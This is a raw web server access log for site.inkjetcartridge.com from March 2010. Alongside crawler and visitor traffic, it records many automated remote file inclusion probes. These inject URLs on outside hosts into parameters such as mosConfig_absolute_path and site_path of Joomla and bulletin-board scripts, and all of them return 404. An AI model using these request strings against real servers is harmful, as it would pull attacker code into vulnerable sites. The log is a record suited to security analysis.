62.140.23.24 - - [01/Mar/2010:16:37:20 -0800] "GET /delete_comment.php?DOCUMENT_ROOT=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:16:37:21 -0800] "GET /logs//delete_comment.php?DOCUMENT_ROOT=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
24.191.88.128 - - [01/Mar/2010:16:43:35 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "http://webmail.aol.com/30746-111/aol-1/en-us/Suite.aspx" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0; MSNbMSNI; MSNmen-us; MSNcOTH)" "site.inkjetcartridge.com"
75.101.187.208 - - [01/Mar/2010:16:48:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "site.inkjetcartridge.com"
75.101.187.208 - - [01/Mar/2010:16:48:29 -0800] "GET /phpbb/viewtopic.php?p=2058 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:16:55:56 -0800] "GET /site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:16:55:56 -0800] "GET /logs//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:16:55:56 -0800] "GET /logs/access.log%20%20//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:16:57:11 -0800] "GET /site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:16:57:11 -0800] "GET /logs//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:16:57:11 -0800] "GET /logs/access.log%20%20//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:16:59:11 -0800] "GET /phpbb/viewtopic.php?t=588 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:17:01:40 -0800] "GET /phpbb/viewtopic.php?t=818 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:17:11:02 -0800] "GET /logs/access.log//site//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:17:15:52 -0800] "GET /phpbb/viewtopic.php?p=953 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:17:40 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:17:40 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:17:41 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:17:21:01 -0800] "GET /phpbb/viewtopic.php?p=83 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
98.234.93.254 - - [01/Mar/2010:17:21:27 -0800] "GET /email/images/inkmail21_05.gif HTTP/1.1" 200 15725 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:17:23:40 -0800] "GET /include/bbs.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:17:23:40 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:17:23:40 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:17:24:04 -0800] "GET /include/bbs.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:17:24:04 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:17:24:04 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:17:24:44 -0800] "GET /phpbb/viewtopic.php?t=579 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
65.55.107.197 - - [01/Mar/2010:17:29:46 -0800] "GET /links/links16.html HTTP/1.1" 200 29593 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:30:37 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:30:37 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:30:37 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:31:38 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:32:48 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:32:48 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:32:48 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:34:39 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:34:39 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.122.197.10 - - [01/Mar/2010:17:34:40 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [01/Mar/2010:17:37:10 -0800] "GET /include/bbs.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.199.54 - - [01/Mar/2010:17:37:10 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
207.46.199.54 - - [01/Mar/2010:17:38:18 -0800] "GET /email/?M=A HTTP/1.1" 200 659 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
98.223.76.167 - - [01/Mar/2010:17:41:41 -0800] "GET /email/images/inkmail21_01.gif HTTP/1.1" 200 7485 "http://us.mc1102.mail.yahoo.com/mc/welcome?.gx=1&.tm=1267493946&.rand=dsfidaiae28d2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPDTDF; InfoPath.2)" "site.inkjetcartridge.com"
98.223.76.167 - - [01/Mar/2010:17:41:41 -0800] "GET /email/images/inkmail21_04.gif HTTP/1.1" 200 15283 "http://us.mc1102.mail.yahoo.com/mc/welcome?.gx=1&.tm=1267493946&.rand=dsfidaiae28d2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPDTDF; InfoPath.2)" "site.inkjetcartridge.com"
98.223.76.167 - - [01/Mar/2010:17:41:41 -0800] "GET /email/images/inkmail21_03.gif HTTP/1.1" 200 16134 "http://us.mc1102.mail.yahoo.com/mc/welcome?.gx=1&.tm=1267493946&.rand=dsfidaiae28d2" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB0.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPDTDF; InfoPath.2)" "site.inkjetcartridge.com"
216.119.103.16 - - [01/Mar/2010:17:42:06 -0800] "GET /components/com_remository/com_remository_constants.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.119.103.16 - - [01/Mar/2010:17:42:06 -0800] "GET /logs/scripts.log//components/com_remository/com_remository_constants.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.119.103.16 - - [01/Mar/2010:17:42:06 -0800] "GET /logs//components/com_remository/com_remository_constants.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:17:45:52 -0800] "GET /logs//include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:17:45:52 -0800] "GET /logs/access_100101.log//include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:17:45:52 -0800] "GET /include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
203.59.136.42 - - [01/Mar/2010:17:49:42 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:17:50:18 -0800] "GET /?S=D HTTP/1.0" 200 2116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
62.140.23.24 - - [01/Mar/2010:17:52:03 -0800] "GET /logs/access.log//include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
24.20.197.22 - - [01/Mar/2010:17:52:23 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:17:53:58 -0800] "GET /phpbb/viewtopic.php?p=6706 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:17:55:13 -0800] "GET /logs//include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:17:55:14 -0800] "GET /logs/access_100101.log//include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:17:55:17 -0800] "GET /include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:17:55:43 -0800] "GET /images/?S=D HTTP/1.0" 200 90912 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:17:57:51 -0800] "GET /logs/access_100101.log//include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:17:57:52 -0800] "GET /include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:17:57:56 -0800] "GET /include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:17:57:56 -0800] "GET /logs/access_100101.log//include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:17:57:56 -0800] "GET /logs//include/mail.inc.php?root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
207.46.199.50 - - [01/Mar/2010:17:59:44 -0800] "GET /email/?N=D HTTP/1.1" 200 659 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:04:02 -0800] "GET /phpbb/viewtopic.php?t=487 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
216.119.103.12 - - [01/Mar/2010:18:05:59 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.119.103.12 - - [01/Mar/2010:18:05:59 -0800] "GET //vwar/backup/errors.php?error=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
216.119.103.12 - - [01/Mar/2010:18:05:59 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:06:59 -0800] "GET /tmp/?S=A HTTP/1.0" 200 786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
8.11.2.10 - - [01/Mar/2010:18:08:50 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "ShopWiki/1.0 ( +http://www.shopwiki.com/wiki/Help:Bot)" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:09:00 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:09:00 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:09:11 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:09:11 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:09:11 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:11:07 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:11:07 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:11:07 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:11:08 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:11:08 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
81.92.215.78 - - [01/Mar/2010:18:11:08 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:11:48 -0800] "GET /logs/access_100301.log HTTP/1.0" 200 12355655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:15:54 -0800] "GET /phpbb/viewtopic.php?p=2405 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.12.117 - - [01/Mar/2010:18:22:36 -0800] "GET /links/links16.html HTTP/1.1" 200 29593 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4325)" "site.inkjetcartridge.com"
194.242.113.160 - - [01/Mar/2010:18:29:36 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:18:31:15 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:18:31:15 -0800] "GET /logs/access.log%20%20///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:18:31:15 -0800] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.169.188.140 - - [01/Mar/2010:18:35:46 -0800] "GET /logs//errors.php?error=http://printalready.com/users/151/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
193.169.188.140 - - [01/Mar/2010:18:35:52 -0800] "GET /logs/access.log//errors.php?error=http://printalready.com/users/151/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
193.169.188.140 - - [01/Mar/2010:18:36:00 -0800] "GET /errors.php?error=http://printalready.com/users/151/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:38:52 -0800] "GET /phpbb/viewtopic.php?p=4234 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
194.242.113.160 - - [01/Mar/2010:18:40:11 -0800] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
194.242.113.160 - - [01/Mar/2010:18:40:11 -0800] "GET /include/mail.inc.php?skin_board_path=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
194.242.113.160 - - [01/Mar/2010:18:40:11 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://www.holod-guru.com/excel/Tests/templates/kontol.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "site.inkjetcartridge.com"
83.103.72.130 - - [01/Mar/2010:18:41:45 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.169.188.140 - - [01/Mar/2010:18:43:39 -0800] "GET /logs/access.log//errors.php?error=http://printalready.com/users/151/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
193.169.188.140 - - [01/Mar/2010:18:43:45 -0800] "GET /errors.php?error=http://printalready.com/users/151/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
193.169.188.140 - - [01/Mar/2010:18:43:51 -0800] "GET /logs//errors.php?error=http://printalready.com/users/151/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:46:45 -0800] "GET /phpbb/viewtopic.php?p=2359 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
83.103.72.130 - - [01/Mar/2010:18:47:00 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [01/Mar/2010:18:47:00 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.103.72.130 - - [01/Mar/2010:18:47:00 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:18:47:16 -0800] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:18:47:16 -0800] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
85.233.162.101 - - [01/Mar/2010:18:47:16 -0800] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.149.244.84 - - [01/Mar/2010:18:49:01 -0800] "GET /phpbb/posting.php?mode=reply&t=176 HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/viewtopic.php?t=176&start=300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
109.120.61.65 - - [01/Mar/2010:18:49:03 -0800] "POST /phpbb/posting.php HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/posting.php?mode=reply&t=176" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:18:49:33 -0800] "GET /phpbb/viewtopic.php?p=668 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
